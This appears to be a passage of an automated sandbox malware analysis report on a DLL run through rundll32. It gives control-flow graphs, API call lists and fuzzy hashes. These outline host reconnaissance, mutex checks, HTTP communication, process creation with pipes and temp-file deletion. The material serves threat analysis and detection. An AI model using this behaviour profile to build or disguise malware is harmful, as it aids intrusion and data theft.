94 7ffe1a512020-7ffe1a512026 93->94 95 7ffe1a512030-7ffe1a512040 94->95 95->88 95->95
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Internet$AddressProc$Option$CloseHandleHttpRequest$ErrorFileHeapLastOpenProcessReadSend$ConnectLibraryLoadQuery
                                                                                                                                                      • String ID: `
                                                                                                                                                      • API String ID: 843668234-1850852036
                                                                                                                                                      • Opcode ID: dbe71b7234fd1478b9a77ea2ff194bf8d90bbe6568d46497f724265beefaff61
                                                                                                                                                      • Instruction ID: 7c38a914e1615d8b8a6a3f3696c2c871ca3545b0b2d2c5faba682ef09bad2dd5
                                                                                                                                                      • Opcode Fuzzy Hash: dbe71b7234fd1478b9a77ea2ff194bf8d90bbe6568d46497f724265beefaff61
                                                                                                                                                      • Instruction Fuzzy Hash: CBE12765B0DF4282EA50DB53A8506BA63A2BF8AFB0F4441F6DA4E43B65DE3CE445C740

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 96 7ffe1a5145e0-7ffe1a5146b8 call 7ffe1a516790 GetVolumeInformationW call 7ffe1a516830 GetModuleHandleW GetComputerNameW GetModuleHandleW GetComputerNameExW GetModuleHandleW GetUserNameW GetModuleHandleW 101 7ffe1a5146c0-7ffe1a5146c9 96->101 101->101 102 7ffe1a5146cb-7ffe1a51478d call 7ffe1a511990 * 3 call 7ffe1a515a20 call 7ffe1a5166f0 call 7ffe1a516790 call 7ffe1a5128f0 101->102 117 7ffe1a514793-7ffe1a5147ac call 7ffe1a512850 102->117 118 7ffe1a514d64-7ffe1a514d85 call 7ffe1a516830 * 2 102->118 123 7ffe1a5147b2 117->123 124 7ffe1a514d5b-7ffe1a514d5f call 7ffe1a5159f0 117->124 126 7ffe1a5147ba-7ffe1a51483d call 7ffe1a516790 * 2 call 7ffe1a511c40 123->126 124->118 135 7ffe1a514843-7ffe1a514848 126->135 136 7ffe1a514ccc-7ffe1a514d04 call 7ffe1a516830 * 2 call 7ffe1a516790 OpenMutexW 126->136 135->136 137 7ffe1a51484e 135->137 149 7ffe1a514d14-7ffe1a514d21 call 7ffe1a516830 136->149 150 7ffe1a514d06-7ffe1a514d0e CloseHandle 136->150 140 7ffe1a514852-7ffe1a51485b 137->140 140->140 142 7ffe1a51485d-7ffe1a514895 call 7ffe1a515d40 call 7ffe1a515de0 call 7ffe1a511990 140->142 156 7ffe1a514cc4-7ffe1a514cc7 call 7ffe1a5159f0 142->156 157 7ffe1a51489b-7ffe1a5148a7 142->157 158 7ffe1a514d23-7ffe1a514d42 GetModuleHandleW GetTickCount SleepEx 149->158 159 7ffe1a514d47-7ffe1a514d53 call 7ffe1a5159f0 149->159 150->149 156->136 157->156 160 7ffe1a5148ad-7ffe1a5148b8 157->160 158->126 159->124 163 7ffe1a5148c0-7ffe1a5148c8 160->163 165 7ffe1a5148ce-7ffe1a514ca7 call 7ffe1a5122d0 163->165 166 7ffe1a514cab-7ffe1a514cae 163->166 165->166 166->163 167 7ffe1a514cb4-7ffe1a514cc0 166->167 167->156
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Handle$Module$Name$Computer$CloseCountInformationMutexOpenSleepTickUserVolume
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2838846479-0
                                                                                                                                                      • Opcode ID: a7d98a780d92d368d99f5791a47d12559dcb0c590ddaab72dbf075023832e14a
                                                                                                                                                      • Instruction ID: bc62318b6e87c6d25a67ffc317e078783354712d0c42f44f403672b8fce2508e
                                                                                                                                                      • Opcode Fuzzy Hash: a7d98a780d92d368d99f5791a47d12559dcb0c590ddaab72dbf075023832e14a
                                                                                                                                                      • Instruction Fuzzy Hash: DBB18072B08E4296EB10DB72E8402BD37A6FB46B68F4441B6DA5E47BA5DF3CD145CB00

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 172 7ffe1a515a20-7ffe1a515a3c 173 7ffe1a515a3e-7ffe1a515a60 call 7ffe1a516790 LoadLibraryW call 7ffe1a516830 172->173 174 7ffe1a515a65-7ffe1a515a6d 172->174 173->174 175 7ffe1a515a6f-7ffe1a515a98 call 7ffe1a5166f0 GetProcAddress call 7ffe1a516830 174->175 176 7ffe1a515a9d-7ffe1a515aa5 174->176 175->176 179 7ffe1a515ace-7ffe1a515ad6 176->179 180 7ffe1a515aa7-7ffe1a515ac9 call 7ffe1a516790 LoadLibraryW call 7ffe1a516830 176->180 184 7ffe1a515b06-7ffe1a515b0e 179->184 185 7ffe1a515ad8-7ffe1a515b01 call 7ffe1a5166f0 GetProcAddress call 7ffe1a516830 179->185 180->179 187 7ffe1a515b3e-7ffe1a515b46 184->187 188 7ffe1a515b10-7ffe1a515b39 call 7ffe1a5166f0 GetProcAddress call 7ffe1a516830 184->188 185->184 193 7ffe1a515b6f-7ffe1a515b77 187->193 194 7ffe1a515b48-7ffe1a515b6a call 7ffe1a516790 LoadLibraryW call 7ffe1a516830 187->194 188->187 199 7ffe1a515ba7-7ffe1a515bf7 call 7ffe1a518730 RtlGetVersion 193->199 200 7ffe1a515b79-7ffe1a515ba2 call 7ffe1a5166f0 GetProcAddress call 7ffe1a516830 193->200 194->193 209 7ffe1a515bf9-7ffe1a515bfb GetNativeSystemInfo 199->209 210 7ffe1a515bfd GetSystemInfo 199->210 200->199 212 7ffe1a515c03-7ffe1a515c0a 209->212 210->212 213 7ffe1a515c10-7ffe1a515c12 212->213 214 7ffe1a515cd2-7ffe1a515cd8 212->214 217 7ffe1a515c14-7ffe1a515c17 213->217 218 7ffe1a515c59-7ffe1a515c5f 213->218 215 7ffe1a515cde-7ffe1a515ce1 214->215 216 7ffe1a515cda-7ffe1a515cdc 214->216 220 7ffe1a515ce3-7ffe1a515ce6 215->220 221 7ffe1a515ce8-7ffe1a515ceb 215->221 219 7ffe1a515d1e-7ffe1a515d24 216->219 222 7ffe1a515c20-7ffe1a515c25 217->222 223 7ffe1a515c19-7ffe1a515c1b 217->223 224 7ffe1a515c61-7ffe1a515c76 218->224 225 7ffe1a515c7b-7ffe1a515c7e 218->225 229 7ffe1a515d26 219->229 230 7ffe1a515d28-7ffe1a515d33 219->230 220->219 226 7ffe1a515d17 221->226 227 7ffe1a515ced-7ffe1a515cf5 221->227 222->226 228 7ffe1a515c2b-7ffe1a515c33 222->228 223->219 224->219 231 7ffe1a515c80-7ffe1a515c95 225->231 232 7ffe1a515c9a-7ffe1a515c9d 225->232 226->219 235 7ffe1a515cf7-7ffe1a515cf9 227->235 236 7ffe1a515cfb-7ffe1a515d15 GetSystemMetrics 227->236 237 7ffe1a515c4f-7ffe1a515c54 228->237 238 7ffe1a515c35-7ffe1a515c4a 228->238 229->230 231->219 233 7ffe1a515c9f-7ffe1a515cb4 232->233 234 7ffe1a515cb6-7ffe1a515cb9 232->234 233->219 234->226 239 7ffe1a515cbb-7ffe1a515cd0 234->239 235->219 236->219 237->219 238->219 239->219
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$LibraryLoad$InfoSystem$NativeVersion
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2883576749-0
                                                                                                                                                      • Opcode ID: edaa7cecb2ce61e8d08a04a1f2505cbfd62d8f4ea06d9fe782e15e0f68590704
                                                                                                                                                      • Instruction ID: 2dcca754f253edd7987110c07b1097a0600fc2b59e9085e1db41eab5e1ea3669
                                                                                                                                                      • Opcode Fuzzy Hash: edaa7cecb2ce61e8d08a04a1f2505cbfd62d8f4ea06d9fe782e15e0f68590704
                                                                                                                                                      • Instruction Fuzzy Hash: 3A912A20B0CE4696FA648B62E8547B96392EF86F78F5804F7D54E82AB1DF7CE444C710

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressFindProc$File$CloseFirstLibraryLoadNextsprintf_s
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3482909146-0
                                                                                                                                                      • Opcode ID: 22d0c2b1a28d00ed540bf15ff744353af3ceb3754b5d0a5077885d68ed8e5c0d
                                                                                                                                                      • Instruction ID: 40605b5492ab324c763ff5dea8500622adcef45ab039e1512dd2b98e31ff3b29
                                                                                                                                                      • Opcode Fuzzy Hash: 22d0c2b1a28d00ed540bf15ff744353af3ceb3754b5d0a5077885d68ed8e5c0d
                                                                                                                                                      • Instruction Fuzzy Hash: F2513661B1DF4290EA50DB63A8141B922A2BF96FB4F4441FBD95E437B6EF2CE845C310
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1A511354), ref: 00007FFE1A51188C
                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1A511354), ref: 00007FFE1A5118B2
                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1A511354), ref: 00007FFE1A5118CD
                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1A511354), ref: 00007FFE1A5118DE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InfoSystem$AddressHandleModuleNativeProc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3433367815-0
                                                                                                                                                      • Opcode ID: ecfc0f5c20cdda23f03c0372d60a1f9a9daa0108346c0d72a78978d45894affb
                                                                                                                                                      • Instruction ID: 2e9cd15faf9898095d130fd6d725dd2add3f7cd15b708ae276aba9364da2d8c2
                                                                                                                                                      • Opcode Fuzzy Hash: ecfc0f5c20cdda23f03c0372d60a1f9a9daa0108346c0d72a78978d45894affb
                                                                                                                                                      • Instruction Fuzzy Hash: 38F0F425B1DA4692E900DB67F554079A3A2BF4AFE4F8401F6D94E43765DE2CE444C610

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryW.KERNEL32(?,?,00000000,00007FFE1A517D51,?,?,00000000,00007FFE1A51228A,?,?,?,00007FFE1A511383), ref: 00007FFE1A517BDF
                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,00000000,00007FFE1A517D51,?,?,00000000,00007FFE1A51228A,?,?,?,00007FFE1A511383), ref: 00007FFE1A517C16
                                                                                                                                                      • LoadLibraryW.KERNEL32(?,?,00000000,00007FFE1A517D51,?,?,00000000,00007FFE1A51228A,?,?,?,00007FFE1A511383), ref: 00007FFE1A517C46
                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,00000000,00007FFE1A517D51,?,?,00000000,00007FFE1A51228A,?,?,?,00007FFE1A511383), ref: 00007FFE1A517C7D
                                                                                                                                                      • GetCommandLineW.KERNEL32(?,?,00000000,00007FFE1A517D51,?,?,00000000,00007FFE1A51228A,?,?,?,00007FFE1A511383), ref: 00007FFE1A517C92
                                                                                                                                                      • CommandLineToArgvW.SHELL32(?,?,00000000,00007FFE1A517D51,?,?,00000000,00007FFE1A51228A,?,?,?,00007FFE1A511383), ref: 00007FFE1A517CA0
                                                                                                                                                      • LocalFree.KERNEL32(?,?,00000000,00007FFE1A517D51,?,?,00000000,00007FFE1A51228A,?,?,?,00007FFE1A511383), ref: 00007FFE1A517D0E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressCommandLibraryLineLoadProc$ArgvFreeLocal
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1914251671-0
                                                                                                                                                      • Opcode ID: 055a219286a0850f7018c79609365c8502faa3a2cecd4e08f0dab71379c2a6f4
                                                                                                                                                      • Instruction ID: 9c02ad0faa51ac0fd36f8935ebe1822431097d76edab3907c28cce7eccde9721
                                                                                                                                                      • Opcode Fuzzy Hash: 055a219286a0850f7018c79609365c8502faa3a2cecd4e08f0dab71379c2a6f4
                                                                                                                                                      • Instruction Fuzzy Hash: AF410624F1DF0281EA50DB57B86417926A2AF9AFB4F8440F7D94E43776EE3CE485C600

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$Handle$CloseCountHeapLibraryLoadModuleMutexOpenProcessSleepTick
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2080402659-0
                                                                                                                                                      • Opcode ID: d16eecc91746005fe88b48e1243f16a1d3d0187000c98afbb7822189259a7abf
                                                                                                                                                      • Instruction ID: 12abf0d4866c81ec13aeadc28283c1bbc69b674d2d3038ea213757bcf361c4de
                                                                                                                                                      • Opcode Fuzzy Hash: d16eecc91746005fe88b48e1243f16a1d3d0187000c98afbb7822189259a7abf
                                                                                                                                                      • Instruction Fuzzy Hash: 51716171B0CA4186EB10DB22E4406B977A5FB46BB4F5402B6DA6E07BE6DF3CE445CB00

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$Handle$CloseCountHeapLibraryLoadModuleMutexOpenProcessSleepTick
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2080402659-0
                                                                                                                                                      • Opcode ID: db2c93b9a8bb71eed27fe1124890a34b3e5ad34da3d0b448050d87d654aa9ec2
                                                                                                                                                      • Instruction ID: a86c542efb82d9c043aac7ec23fb9411b15ea6750974b0dc5bb1fc23b58b9cfd
                                                                                                                                                      • Opcode Fuzzy Hash: db2c93b9a8bb71eed27fe1124890a34b3e5ad34da3d0b448050d87d654aa9ec2
                                                                                                                                                      • Instruction Fuzzy Hash: C7617471B0CB4186EB10DB22E4442BA77A6FB46BA8F5401B7DA5E47BA6DF3CD045CB00

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$Handle$CloseCountHeapLibraryLoadModuleMutexOpenProcessSleepTick
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2080402659-0
                                                                                                                                                      • Opcode ID: 7a580459977b9964d557fef637bfe6f08bfa79b23d7ecff0e220c8c46af59cf3
                                                                                                                                                      • Instruction ID: c9db24f93a36093d6618c5c6e13b0df828505da16603e9d7fcd0518137dfb195
                                                                                                                                                      • Opcode Fuzzy Hash: 7a580459977b9964d557fef637bfe6f08bfa79b23d7ecff0e220c8c46af59cf3
                                                                                                                                                      • Instruction Fuzzy Hash: A2516271B0CF4286EA10DB22E4442B977A6FB46BA4F5441B7DA5D47BA6DF3CE045CB00

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$Handle$Module$CloseCountHeapLibraryLoadMutexOpenProcessSleepTick
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2321454388-0
                                                                                                                                                      • Opcode ID: ea4f16c014b59073cc8f5d6b610da928ceb4e233ce794afe2b6dee2f5f9978f3
                                                                                                                                                      • Instruction ID: 649ca98f836f71429c3237e473faf362a82ea6cc600903029bf3b4057d58c426
                                                                                                                                                      • Opcode Fuzzy Hash: ea4f16c014b59073cc8f5d6b610da928ceb4e233ce794afe2b6dee2f5f9978f3
                                                                                                                                                      • Instruction Fuzzy Hash: EB516271B0CF4286EA10DB22E4442B977A6FB46BA4F5441B7DA5D47BA6DF3CE045CB00

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$Handle$CreateProcess$CloseCountCurrentDirectoryHeapInformationLibraryLoadModuleMutexObjectOpenPipeSingleSleepTickWaitsprintf_s
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3732969655-0
                                                                                                                                                      • Opcode ID: ba4f6bc2ec75780c302ac81e3c307eb0cf5cf99330ae4b9c9c1729213cce2c26
                                                                                                                                                      • Instruction ID: 23b3124ae234e110fd2eff781e7c08ebcbf80b720ea30afc79de8157ed66091b
                                                                                                                                                      • Opcode Fuzzy Hash: ba4f6bc2ec75780c302ac81e3c307eb0cf5cf99330ae4b9c9c1729213cce2c26
                                                                                                                                                      • Instruction Fuzzy Hash: 66516371B0CB4286EB10DB22E4442BA77A6FB46BA4F5401B7DA5D47BA6DF3CD145CB00

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$HandleOpen$CloseModule$CountEnumHeapLibraryLoadMutexProcessQuerySleepStartupTickValuegethostbynamegethostnameinet_ntoa
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 51037661-0
                                                                                                                                                      • Opcode ID: a6862768191938aedb4d2179c42331d9c76e41a9b2bf2ef8ecb1b2155ce9b823
                                                                                                                                                      • Instruction ID: 9b6caedba9914daebfbf5a33b73cae439de0abebc53bc245df403c4e70dc5812
                                                                                                                                                      • Opcode Fuzzy Hash: a6862768191938aedb4d2179c42331d9c76e41a9b2bf2ef8ecb1b2155ce9b823
                                                                                                                                                      • Instruction Fuzzy Hash: 29515271B0CF4286EA10DB22E8442BA77A6FB46BA4F5441B7DA5D47BA5DF3CE045CB00

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Temp$DeleteHandleName$AddressCloseCountHeapLibraryLoadModuleMutexOpenPathProcProcessSleepTick
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3639944527-0
                                                                                                                                                      • Opcode ID: 8d719ceab6d8d7e53d0274f050039b4cfc6d783270bfcb1f42072c3fd141ad19
                                                                                                                                                      • Instruction ID: 554eeff3cb1ca30c8535d37bde3291993904b66e357c0f9d6aa8c98dc5411ae5
                                                                                                                                                      • Opcode Fuzzy Hash: 8d719ceab6d8d7e53d0274f050039b4cfc6d783270bfcb1f42072c3fd141ad19
                                                                                                                                                      • Instruction Fuzzy Hash: 84518D71B0CE4286EA10DB62E8142B977A2FB46BA4F4441F7DA5E07BA6DF3CE445C700

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
